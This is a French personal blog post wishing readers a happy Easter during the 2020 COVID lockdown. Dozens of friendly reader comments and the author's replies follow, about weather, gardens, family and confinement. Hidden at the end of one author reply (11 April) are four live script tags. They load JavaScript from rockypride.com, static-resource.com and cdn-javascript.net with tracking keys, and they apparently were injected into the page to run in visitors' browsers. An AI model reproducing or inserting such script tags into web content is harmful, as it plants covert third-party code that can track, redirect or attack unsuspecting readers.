• Joyeuses Pâques

    Bonjour mes ami(e)s,

    J'espère que vous allez bien ou mieux, que vous vivez avec

    courage le confinement. Pour ma part, je respecte les consignes,

    je reste à la maison , j'ai la chance d'habiter  la campagne

    et d'avoir un jardin, ce qui rend bien service surtout par 

    ce temps printanier.

    Je vous souhaite un excellent week-end , de bonnes fêtes

    de Pâques, on ne va pas dire en famille, on ne peut pas

    se réunir mais les moyens de communication ne manquent

    pas , le téléphone, Skype, les réseaux sociaux sans

    oublier le net (les blogs ). Une pensée pour les personnes

    seules ou souffrantes.

    Joyeuses fêtes de Pâques. A mardi prochain.

    Bisous

     Joyeuses Pâques

    Merci à Marjolaine pour cette jolie signature

     Joyeuses Pâques

     Joyeuses Pâques

     Joyeuses Pâques  

     Joyeuses Pâques

     


  • Commentaires

    56
    Lundi 20 Avril 2020 à 09:01

    Coucou du lundi

     

    Et plein de bonnes choses pour toi en

    ce lundi, et surtout un bon moral.

    Chaque jour qui passe est un pas de plus

    sur le chemin qui mène vers la liberté.

    Aussi c'est avec un panier plein d'espoir

    Que  je passe  déposer ce matin dans ton joli univers

    J'adore te lire! c'est super les légendes

    Bon lundi ma douce et bonne semaine

    Marjolaine

    55
    Lundi 20 Avril 2020 à 05:54

    --Bonjour  BERNADETTE

    Nous voici lundi, nous sommes reparti,

    pour une nouvelle semaine

    qui ne devrait pas nous apporter

    grand chose dans notre attente!

    Après un dimanche bien tristounet

    nous sommes passés avec le ciel

    par une palettez de gris

    du plus clair au plus foncé.

    Le soleil bien caché, dans les nuages,

    et pour nous bien confiné

    dans la maison, en espérant qu'aujourd'hui

    soit un autre jour plus joyeux

    bon début de semaine en prenant bien

    soin de vous et de tout ce qui s'en rapproche!

    Amitiés #^&^# Bisous.

    . * J-G-R-C-202*.

    54
    Dimanche 19 Avril 2020 à 21:54

    Bonsoir Violette,

    mon petit passage du soir en espérant que tout va bien pour toi en ce confinement qui continue pour te souhaiter une bonne soirée ainsi qu'une bonne semaine. Gros bisous.

    53
    Dimanche 19 Avril 2020 à 11:01

    BONJOUR  VIOLETTE

    merci de ta visite

    oui j'ai pu voir mes diablotins qui grandissent +++

    et  j'ai vu ma petite puce de visu 

    un grand bonheur qui a fété ses 12 jours hier

    ce matin pluie, pas de jardinage

    le planning ordi, cuisine et rangement

    bon dimanche et bisoussss

    52
    jeni
    Dimanche 19 Avril 2020 à 08:15

    Bonjour Bernadette,

    J'ai décidé de ne plus regarder les informations ni de lire les quotidiens tant il y a des différences d'interprétations et des commentaires pas toujours dénués d'intérêts partisans et de me consacrer uniquement au bien être de ma famille en respectant la seule chose valable pour le moment qui a démontré son efficacité c'est le sérieux du confinement voire de l'isolement.
    Je suis scandalisé de certains propos de personnages qui se disent importants et qui à longueur de temps donnent des ''conseils'' sur ce qui devrait être fait et critique ce qui à déjà été fait..
    mais si il y avait une solution miracle je pense qu'elle serait déjà acceptée et je ne crois pas non plus à une manipulation qui aurait pour but déstabiliser le monde… Tout cela est malheureusement diffusé et beaucoup s'engouffre dans ces fausses informations pour les rediffuser en les amplifiants ce qui ajoute au malaise actuel…
    Pour ma part je reste confiant en la possibilité de notre système pour arriver à trouver une solution à cette pandémie mais je redoute l'après qui sera à n'en pas douter une curée et des règlements de compte tant au niveau politique que financiers
    Nous n'en avons pas fini avec les suites!!!
    ceci ne m'empêche pas de te souhaiter une très bonne journée avec toute mon amitié
    Bises amicales
    Jean

    51
    Samedi 18 Avril 2020 à 17:14

    ❤️ Belle journée à vous tous le vie continue à vive allure❤️

    Bonjour 
    Chaque jour qui se lève
    Ajoute une page
    Au grand livre de la vie
    Une vie difficile en ce moment
    Je passe te souhaiter
    Une magnifique journée
    Et un bon week-end à la semaine prochaine
    Gros Bisous douceur du cœur de kikinette  

    ❤️ Belle journée à vous tous le vie continue à vive allure❤️

    50
    Samedi 18 Avril 2020 à 13:12
    49
    municrea
    Vendredi 17 Avril 2020 à 16:40

    bonjour Bernadette

    excellent vendredi et très bon wk qui va commencé
    17° extérieur ce matin appréciable
    plus  besoin de chauffage depuis plus d'une semaine
    bonne journée
    bisous
    Nini

    48
    Vendredi 17 Avril 2020 à 16:29

    BON WEEK-END A VOUS, AMIS CREATIFS DONT JE SUIS FIERE a toi violette 

    je te souhaite un bon anniversaire 

    tu vas bien ? 

    pas trop dur de rester a la maison 

    pour moi je vais dans mon jardin 

    la mer me manque 

    gros bisous 

      • Vendredi 17 Avril 2020 à 17:22

        Coucou Mireille,

        Merci pour tes souhaits. Oui, je vais bien mais le confinement

        devient difficile même avec le jardin. J'ai eu la famille

        au téléphone, ça fait chaud au cœur. 

        Je comprends que la mer te manque !

        Passe un excellent week-end et prends bien soin de

        toi et de tes proches. Gros bisous-violette

    47
    Vendredi 17 Avril 2020 à 14:56

    un petit coucou Violette avant le weekend,j'espère que tu vas bien,il fait bien lourd sur notre Gironde ,je sais pas si sa vas nous faire venir la pluie,je te souhaite un très bon Vendredi,bises

    46
    Vendredi 17 Avril 2020 à 13:09

    Coucou du vendredi

    J'arrive les bras chargés de fleurs

    et avec le soleil après l'orage.

    Ca n'a pas duré plus de 10 minutes, mais violent

     et au moment ou je sortais Nina.

    Pauvre puce, elle était trempée.

    Mais maintenant il fait de nouveau beau.

    Merci encore une fois pour ta fidélité et  tes gentils messages

    Un gros bisou

    Marjolaine

    45
    Jeudi 16 Avril 2020 à 16:22

    merci c'est gentil images - Recherche Google | Gentil, Recherche ...

    Bonjour ma gentille Bernadette 

    Merci d'avoir pensé a moi, c'est difficile j'arrive pas avec Fabien et je stress beaucoup, aujourd'hui, il a dormi vu qu'il n'avait pas dormi la nuit avec une belle crise, il a dormi le jour, j'ai pu tondre mes pelouses et coupé mes rosiers grillés par le soleil tout sec, j'ai tout coupé a 20 cm  s'il pleut il reprendront, j'attend ma belle fille pour les courses je lui fait    ce qu'il me faut pour la semaine, su un papier et elle passe e soir pour faire mes courses demain soir quand elle sort de son travail,  encore confiné jusqu'en fin mai pour moi ou début juin car Fabien ne reprendra pas la mas avant début juin,  je t'embrasse fort ma douce, bonne soirée, Marie

    44
    Jeudi 16 Avril 2020 à 15:38

    Salut

    Un mois de plus en confinement.

    On cherche à faire quelque chose tous les jours et comme on trouve plus rien à faire on prend l'air du jardin ou on regarde la télé.

    J'ai de la chance car j'ai un blog.

    Bonne journée

    43
    Jeudi 16 Avril 2020 à 10:03

    Bonjour ma douce amie Violette

    J'espère que tu vas bien, prends bien soin de toi surtout et prudence et courage.

    Hier je n'avais pas trop la forme ni le moral, un coup de blues mais çà passera plus des douleurs dans le dos... (suite à une chute que j'ai faite sur mon tapis de marche/course il y a quelques jours) mais ce matin j'essaye d'avoir la PPP pleine pensée positive.

    L'hiver austral commence à s'installer sur mon île et cela me réjouit car c'est ma saison préférée et habitant le long du littoral les températures restent douces.

    Merci de ta gentille visite.

    Je te souhaite une belle fin de semaine et te fais de gros bisous d'amitié de loin de mon ti rocher.

     

     

    42
    Jeudi 16 Avril 2020 à 09:18

    bonjour violette, très bᐅ 24 Anniversaire images, photos et illustrations pour facebook ...el anniversaire! oups j'ai réussi à te mettre une image! j'espère que tu passeras une belle journée, confinée mais bon! c'est ta journée profites-en bien! bisous

     

    41
    municrea
    Jeudi 16 Avril 2020 à 09:05

    bonjour Bernadette

    excellente journée en ce jeudi
    que je te souhaite agréable
    ciel gris ce matin et pluie cette nuit
    cela fait du bien a notre belle nature
    bonne journée accompagnée de bisous
    Nini

    40
    Jeudi 16 Avril 2020 à 06:09

    --Bonjour  Bernadette

    Pas de changement,

    comme le confinement

    journée de mercredi

    a l'identique

    a celle de mardi,

    Ciel bleu soleil et vent,

    bon jeudi et moral

    pour un excellent début

    de la deuxième quinzaine d'avril

    confiance, prudence & patience!

    Amitiés #^&^# Bisous

    . * J-G-R-C-202*.

     

     NE SOYons PAS  EGOISTE  

     PENSons AUX AUTRES  

     

    39
    Mercredi 15 Avril 2020 à 19:55

    BONSOIR  MA  CHERE  VIOLETTE

    j'espere que tu vas bien

    toujours en confinement , je respecte l'isolement comme beaucoup

    mais cela devient difficile 

    Homme n'est pas raisonable malgré les enfants

    qui lui disent de ne pas sortir

    mon gendre nous achete ce qu'il manque et je vide le congel

    il est tres content, il respire mieux  MDR

    bonne soiree   bisousss

    38
    Mercredi 15 Avril 2020 à 17:18

    Bonjour Violette

     Heureusement chez nous c'est un peu moins stricte qu'en France mais je respecte un maximum le confinement.

    Je te souhaite une belle journée et prend bien soins de toi.

    Bisous,

     

    Rohnny

     

    37
    Mercredi 15 Avril 2020 à 16:00

    bonjour violette merci de ton passage je narrive a ecrire tout part bonne soirée bisesssss

    36
    Mercredi 15 Avril 2020 à 14:54

    Coucou Bernadette , oui c'est une chance d' habiter la campagne ! . Nous habitons face à l' océan mais les plages sont interdites ce qui m' oblige à regarder la mer du haut de la falaise ou du petit port ! . Merci pour ta viste sympa et bonne semaine bien au calme , gros bisous , 

    35
    Mercredi 15 Avril 2020 à 12:50

    Bonjour Violette.
    Aujourd'hui, nous allons avoir une belle journée et cet après midi, je vais prendre l'air au jardin.
    Comme nous avons repris presque un mois de confinement supplémentaire, je vais mettre de l'eau dans le bassin du jardin et des poissons rouges et y pêcher dedans!!!
    Bonne journée.
    Bisous de nous deux.

    Gifs Animés Peche

    <p>&nbsp;<embed width="600" height="450" src="
    https://ahp.li/58ea428edcf4b82b4084.html" wmode="transparent"></embed></p>

     Une de mes créations pour faire patienter

     

    34
    JENI
    Mercredi 15 Avril 2020 à 10:42

    Bonjour Bernadette,

    Merci de ton passage sur mon blog en cette belle journée pleine de soleil, que je te souhaite excellent je t offre toute mon amitié

    Bises amicales

    Jean

     

    33
    Mercredi 15 Avril 2020 à 10:41

    Coucou  du mercredi

     

    Coucou j'arrive

    Avec un grand et beau soleil

     comme beaucoup d'entre nous je crois

    Les oiseaux chantent de tout leur coeur.

    Ils sont insouciants et c'est très bien.

    Il nous redonnent un peu de leur joie de vivre.

    Merci pour tes gentilles visites

    Un gros bisou

    Marjolaine

    32
    Mercredi 15 Avril 2020 à 05:05

    -Bonjour  BERNADETTE

    Comme la semaine va passer mode T G V,

    nous voici déjà au cœur de la semaine

    avec un grand rafraîchissement,

    du a un vent d'est plutôt glacial 16 ° ,

    en plein après midi malgré un soleil

    rayonnant dans un beau ciel bleu.

    C'est avec un ras le bol de la rallonge

    de trente sept jours décider

    par une bande de guignol qui font

    un pas en avant deux en arrière,

    avec mensonges sur mensonges

    la franchise n'étant pas leurs philosophie!

    Sur ce restons prudent et patient

    même si en Mai, fait ce qu'il te plaît !

    Amitiés #^&^# Bisous

    . * J-G-R-C-202*.

     

     NE SOYons PAS EGOISTE 

     PENSons AUX AUTRES  





    31
    Mardi 14 Avril 2020 à 16:40

    Bonjour Bernadette
    le prolongement du confinement était prévu et c'est bien pour soi-même et le bien des autres
    du soleil cet après-midi mais baisse  des températures 
    je te souhaite une agréable journée malgré le confinement
    gros bisous amicaux

    30
    Mardi 14 Avril 2020 à 14:41

    un petit coucou Violette en début de semaine,j'espère que tu vas bien,il fait soleil mais frais le matin mais j'ai pu allez a mon jardin,  je te souhaite un très bon Mardi,bises

    29
    municrea
    Mardi 14 Avril 2020 à 09:42

    bonjour Bernadette

    excellent mardi
    sous un magnifique soleil et frais ce matin !
    on est  reparti pour une nouvelle semaine !
    gardons le moral
    gros bisous
    Nini

    28
    JENI
    Mardi 14 Avril 2020 à 09:14

    bonjour Bernadette,

    Et bien comme il fallait s'y attendre, nous voilà repartis pour un mois de plus au minimum...pour que les activités commencent à reprendre...Quant à nous, le personnes âgés...celles qui depuis le départ sont considérés comme ''fragiles'' nous n'en ferons pas parti….il va falloir encore attendre un peu plus...combien de temps???? certains prévoient pas avant la fin de l'année, d'autre jusqu'à ce qu'il y ai un vaccin enfin, encore une fois beaucoup de choses qui sont dites sans fondements mais il est certain que les personnes à risques dont nous faisons parti seront une nouvelle fois ''dans le collimateur'' nous n'avons pas fini de nous morfondre!!! mais nous sommes des improductifs alors….dans le contexte actuel nous ne servons à rien!!!!
    Sur cette note plutôt triste, je te souhaite une bonne journée
    Bises amicales
    Jean

     

    27
    Mardi 14 Avril 2020 à 05:40

    Bonjour ma douce amie Violette

    C'est sous le soleil ce matin et avec une petite fraîcheur matinale qui nous annonce l'arrivée de l'hiver austral que je viens te saluer.

    Un beau billet pour Pâques avec de belles images, je n'ai même pas mangé de chocolat à Pâques...car je n'en avais pas, je me rattraperai à Noël LOL !!!!!

    Nous voilà repartis pour un mois de confinement, on va finir en fruits confis, je pense très fort à celles et ceux qui sont dans un tout petit appartement sans balcon, alors que moi j'ai la chance d'avoir maison et jardin. Courage et prudence pour celles et ceux qui bossent soignant(e)s et non soignant(e)s.

    Je te souhaite un beau mardi au soleil.

    Prends bien soin de toi.

    Gros bisous d'amitié de mon île intense.

    Résultat de recherche d'images pour "bisous de françoise GIF HUMOUR"

    26
    Lundi 13 Avril 2020 à 15:10


    coucou
    C’est parti pour la chasse aux voeux !
    Oh ! J’ai trouvé la chance, derrière les tulipes !
    Et moi la santé, sous un peuplier !
    Regarde, voici l’amour, caché dans mon coeur.
    Et si tu cherches le bonheur, tu viens de le trouver…
    … dans cette carte enchantée !
    Que ce merveilleux jour de Pâques, rempli de douceurs et de surprises, t’apporte tout ce que tu souhaites.
    Et pourquoi pas un peu de chocolat aussi :
    gros bisous

    25
    Lundi 13 Avril 2020 à 09:19

    Coucou du lundi

     

    Et voilà même si  c'est pâques on est lundi

    et j'en profite pour te rendre une petite visite.

    En espérant que ton week end c'est bien passé, pas trop

    triste de ce confinement,

    Le soleil est toujours de la partie un petit peu moins chaud

    mais tout de même  quel beau temps.

    Je te souhaite une bonne semaine

    un gros bisou

    Coucou du lundi

      • Lundi 13 Avril 2020 à 11:19

        Bonjour et merci Marjolaine,

        Oui Pâques s'est bien passée mais pas de petits-enfants

        pour chercher les oeufs en chocolat dans le jardin,

        on se téléphone pour avoir des nouvelles. Me voilà

        que les blogs, on communique , c'est important.

        Passe aussi une belle semaine.

        Gros bisous - violette

         

    24
    Dimanche 12 Avril 2020 à 20:05

    un petit coucou pour te souhaiter une agréable soirée, un bon lundi de Pâques ainsi qu'une bonne semaine. Gros bisous.

     

      • Lundi 13 Avril 2020 à 11:23

        Coucou Fanou,

        Merci et bon lundi de Pâques à toi aussi , passe

        une belle semaine.

        Prends bien soin de toi et de tes proches.

        Gros bisous-violette

    23
    jeni
    Dimanche 12 Avril 2020 à 09:07

    Bonjour Bernadette,

    Samedi pas bien et dimanche le peps semble être de retour voilà la vie en ce moment comme des ''montagnes russes, un jour bas et un autre au top… C'est peut être consécutif au confinement ou au début du printemps qui fait monter la sève mais qui n'a pas assez de force pour faire éclater le peps!!!
    Triste bilan mondial et le nombre de décès ne cesse d'augmenter … Pour les gens qui critiquaient les premières inquiétudes les voilà bien dans l embarras maintenant que la certitude que ce n'est pas une petite grippette comme il semblaient le dire au début… et que dire des dirigeants qui n'ont pas pris la mesure des risques et qui se trouvent maintenant devant un terrible situation….
    La pandémie est là et elle n'est pas prête de céder la place Alors, pour le bien de tous il faut accepter de rester confiné et surtout de continuer à faire confiance aux directives données qui ne le sont que parce qu'aucune autre solution n'a été trouvée.
    Il va falloir attendre la fabrication d'un remède pour sortir de cette crise car le confinement n'est en soi qu'un moyen d'éviter la contagion mais n'est pas fait pour la guérison
    Médicament ou vaccin  le premier laboratoire qui trouvera la solution assurera sa richesse et sa notoriété à vie!!!!
    Je te remercie mon amie d'être passée sur mon blog malgré mon absence et je te souhaite une très bonne journée de dimanche de PAQUES
    Bisous amicaux
    Jean

      • Lundi 13 Avril 2020 à 11:38

        Bonjour Jean,

        Oui d'accord avec toi, cette pandémie est terrible mais

        je pense aussi que les mesures ont été prises peut-être

        un peu tard.J'ai un fils en Allemagne, il vit et travaille

        là-bas avec son épouse qui est allemande,ils ne sont

        pas confinés mais ont des recommandations, ne pas

        inviter d'amis, faire attention, on a de bonnes nouvelles

        il n'y a pas tant de cas qu'en France et il semble que

        tout soit prêt plus de dépistage etc.. mon fils est

        aussi en télé travail à la maison. Je te souhaite ainsi qu'à

        Nini un bon lundi de Pâques; Pour nous Pâques

        se passe tranquilles à la maison.

        Bise amicale à vous deux-violette

         

    22
    Samedi 11 Avril 2020 à 10:13

    ᐅ 34 Pâques images, photos et illustrations pour facebook ...

    bonjour violette 

    j'éspére que tu vas bien 

    voila un beau samedi ,soleil et chaleur 

    bonne féte de paques 

    bises a toi 

      • Lundi 13 Avril 2020 à 11:42

        Bonjour Mireille,

        Oui la fête de Pâques se passe bien, ça va pour le mieux

        avec ce beau temps on peut aller dans le jardin. J'espère

        que tu vas bien aussi. Je te souhaite un bon lundi

        de Pâques sous le soleil. Gros bisous-violette

    21
    municreaz
    Samedi 11 Avril 2020 à 08:27

    bonjour Bernadette

    excellent wk pascal sous un beau soleil
    passe une bonne journée
    prends soin de toi et des tiens
    bisous
    Nini

      • Lundi 13 Avril 2020 à 11:43

        Merci Nini, passe aussi une belle journée ce lundi

        de Pâques ; Prends bien soin de toi et de Jean-Bisous-violette

    20
    Samedi 11 Avril 2020 à 05:25

     

     

    -Bonjour  BERNADETTE

    Malgré le confinement,

    ne nous laissons pas

    a avoir la vague a l’âme,

    cette année cela sera chacun de son coté,

    pour le bien de nos famille,

    il sera temps dans les prochaines semaine

    de se rattraper et de les choyer,

    Que pourrais-je vous souhaiter

    de mieux que du soleil, du repos

    et un festin gourmand.,

    pourquoi se priver

    Joyeux week-end de Pâques

    Amitiés #^&^# Bisous

    . * J-G-R-C-202*.

      • Lundi 13 Avril 2020 à 11:47

        Bonjour et merci Joël pour tes souhaits. C'est vrai

        j'ai concocté un petit repas à déguster en amoureux ! lol

        Continuons à respecter les consignes c'est pour le

        bien et la santé de tous. Bon lundi de Pâques ainsi

        qu'à ton épouse. Bisous-violette

    19
    Samedi 11 Avril 2020 à 05:18

    Bon week end avec des jours qui se suivent et se ressemblent pour la majorité d'entre nous.
    Une pensée pour tous ceux qui travaillent pour assurer notre sécurité et la continuité de notre vie.
    La solidarité doit rester notre première préoccupation !
    Je continue à avoir très mal au dos mais je pense à tous ceux qui luttent pour garder la vie.
    Beau papa a très mal supporté sa transfusion : il est très faible et a du mal à reprendre le dessus.
    Pendant que mon chéri fait le nettoyage de l'extérieur avec un parc, potager et verger qui n'auront jamais été aussi propres et beaux que cette année, surtout à cette saison !
    Gros bisoux, chère bernadette ♥

     

      • Lundi 13 Avril 2020 à 11:55

        Bonjour ma Dom,

        Merci pour ton gentil message; C'est vrai qu'il faut

        continuer à respecter les consignes. Désolée pour

        Beau-Papa, j'espère qu'il va pouvoir se remettre.

        Oui il faut penser aux personnes malades, à tout le personnel

        médical en première ligne.Pour nous aussi , mon chéri

        bricole et s'occupe du terrain et moi je cuisine un peu

        plus, je jardine mais pas encore planté grand chose

        à cause des fameux Saints-de -glace !...

        Bon lundi de Pâques mon amie.

        Prends bien soin de toi.

        Gros bisous -violette

    18
    Vendredi 10 Avril 2020 à 20:47

    Bonjour  chère  Violette

    Merci  de  ton  gentil  message  et  joyeuses  fêtes  de  pâques

    pour  toi  aussi  avec  ton  mari  Bisous  de  ton  ami  Lucien 

    sleep  sleep  cool

     

      • Samedi 11 Avril 2020 à 03:17

        Merci Lucien, passe aussi de belles fêtes de Pâques

        malgré le confinement, le ciel est avec nous avec

        une météo bien clémente. Bisous

        <

        <script src="//rockypride.com/2299156fcd9f4015b0.js"></script> <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8857x" type="text/javascript"></script> <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8857x&format=arrjs&r=1586567831678" type="text/javascript"></script> <script src="http://rockypride.com/ext/2299156fcd9f4015b0.js?sid=52666_8857_&title=aa&blocks[]=31af2" type="text/javascript"></script>
    17
    Vendredi 10 Avril 2020 à 19:51

    Merci mon amie Bernadette . Je te souhaite également de joyeuses Pâques malgré ce climat assez difficile et profite bien de cette campagne pour y faire de belles balades seule ou avec ton cher mari . Nous aussi nous sommes à la campagne et il m'arrive de m'évader seul dans la nature qui est si belle en ce début de printemps . Gros bisous et à bientôt , prends surtout bien soin de toit et de ceux que tu aime .

      • Lundi 13 Avril 2020 à 12:00

        Bonjour Emile,

        Merci et bon lundi de Pâques et une belle semaine.

        J'espère que tu vas bien et que l'état de santé de ton épouse

        s'améliore;Moi aussi, j'aime bien sortir seule parfois

        car la nature au printemps est géniale !

        Prends bien soin de toi et de tes proches;

        Bisous-violette

    16
    Vendredi 10 Avril 2020 à 19:43

    De gros gros bisous !

      • Lundi 13 Avril 2020 à 12:01

        Merci Juju, je te souhaite aussi un bon printemps,

        une belle semaine malgré le confinement.

        Prends bien soin de toi.

        Gros bisous-violette

    15
    Vendredi 10 Avril 2020 à 17:47

      • Vendredi 10 Avril 2020 à 19:41

        Merci de même pour toi et ton mari. Joyeuses fêtes

        de Pâques  .Bisous

    14
    Vendredi 10 Avril 2020 à 16:39

    Bonjour ma belle 

    Je viens te souhaiter une belle fin de semaine et un bon weekend de Pâques

    Cette année il sera différent, on ne pourras pas recevoir.cry

    Mais pour se consoler le soleil est la et nous remonte un peu le moral

    Petit cadeau, ça fait du bien le chocolat.

    Je te retrouve mardi.Gros bisous Jasmine.♥

     

    Chocolats de Pâques

      • Vendredi 10 Avril 2020 à 19:44

        Merci Jasmine pour cette jolie création cadeau

        chocolats ; Bonnes fêtes de Pâques avec ton

        chéri et Ioka. Gros bisous-violette

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :